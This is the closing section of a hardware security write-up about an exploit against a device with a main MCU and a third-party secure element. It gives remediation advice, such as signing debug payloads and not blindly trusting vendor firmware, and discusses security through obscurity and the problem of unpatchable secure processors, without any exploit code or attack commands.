Takeaways

Anonymous Author: I am in hell.
Yours Truly: Halifax is in Canada. Technically speaking, it is the exact meteorological opposite of hell.

The exploit by John Breaux is a case study of how tricky it can be to attack an implementation like this. The black box analysis process is fraught with subtle perils, and debugging is often maddening. The read address overflow technique is an example of how to shine more light into the inscrutable abyss.

Remediation

At a conceptual level, the hardware design of this system is an improvement over something like Whitehorse. Adding the logical AND transistor creates a layer of defense in depth enforced at a physics level. Bypassing this protection requires compromising two different chips. That said, there are two failures in this implementation.

1. Do not execute arbitrary user-supplied payloads on the main MCU.

A glaring issue remains unexamined: nothing about this architecture requires it to allow arbitrary unsigned code execution on the main MCU. Debug payloads should be signed, as on St. John's or Cold Lake, or eliminated from the implementation altogether.

This mitigation requires attackers to bypass the signature verification mechanism or find another issue that allows them to gain a foothold on the main MCU, adding another layer of defense-in-depth.

2. Do not implicitly trust third-party vendors to write secure code.

The graver vulnerability lies in the ostensibly third-party secure element. In reality, there is no easy way to audit the backing software implementation for such a system. Patching would be the vendor's responsibility, and there may be no firmware update mechanism.

In the best-case scenario, this requires waiting for the third-party vendor to ship out patches. In a worst-case scenario, it is unpatchable, and fixing the vulnerability requires releasing a new generation of hardware. This risk management "strategy" is a commonplace.

The Problem With Hardware Security

The Semantics Of Security Through Obscurity

Secure elements are designed, in part, to protect against hardware attacks. The problem in the hardware security world is that manufacturers tend to conflate two kinds of security through obscurity. There is a credible argument that undocumented hardware countermeasures demonstrably impede attackers. In this sense, the system relies on hardware-level security through obscurity. Disclosing the hardware-level workings I.e., data sheets or schematics. of the chip would put that protection in jeopardy. This "protection" is a byproduct of the relatively nascent general state of the hardware security field. Falling equipment prices and more accessible education about the subject area will eventually undermine it.

That said, the fact that this logic only applies to physical hardware-level security (not firmware or software security) cannot be understated. Just because code runs on a processor secured against hardware attacks does not magically make that code secure against software exploits. Regardless of the platform, software security through obscurity is not an effective countermeasure.

The assumption seems to be that hardware-level security implies software-level security. This belief may stem from the assumption that attackers must extract firmware via a hardware attack and that black box firmware analysis is infeasibly expensive. As the exploit described herein demonstrates, this is not always the case.

Secure processor code is like any other code. Performing source code vulnerability analysis and penetration testing is essential. Blind trust in these devices is foolish—especially for security-critical applications.

Patching

Unpatchable black box hardware is depressingly frequent among chips of this variety. It is critically important to determine, before hardware architecture finalization, whether firmware updates are possible for this type of component and, if so, whether the vendor has responded appropriately to security issues in the past. Any "secure processor" that cannot pass muster necessitates its replacement with one that can.